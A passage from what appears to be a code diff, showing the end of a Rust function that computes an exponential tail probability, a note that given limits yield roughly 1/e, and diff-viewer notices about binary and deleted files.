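    // scale * X is exponential with mean scale^2, so
    // P(scale * X > t) = exp(-t / scale^2).
    (-threshold / (scale * scale)).exp()
}
```

With `scale = u16::MAX` and `threshold = u32::MAX`, the exponent is very close to -1, so the result is close to 1/e.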
Binary file not shown.
Binary file not shown.
@@ -1 +0,0 @@
[]

Some files were not shown because too many files have changed in this diff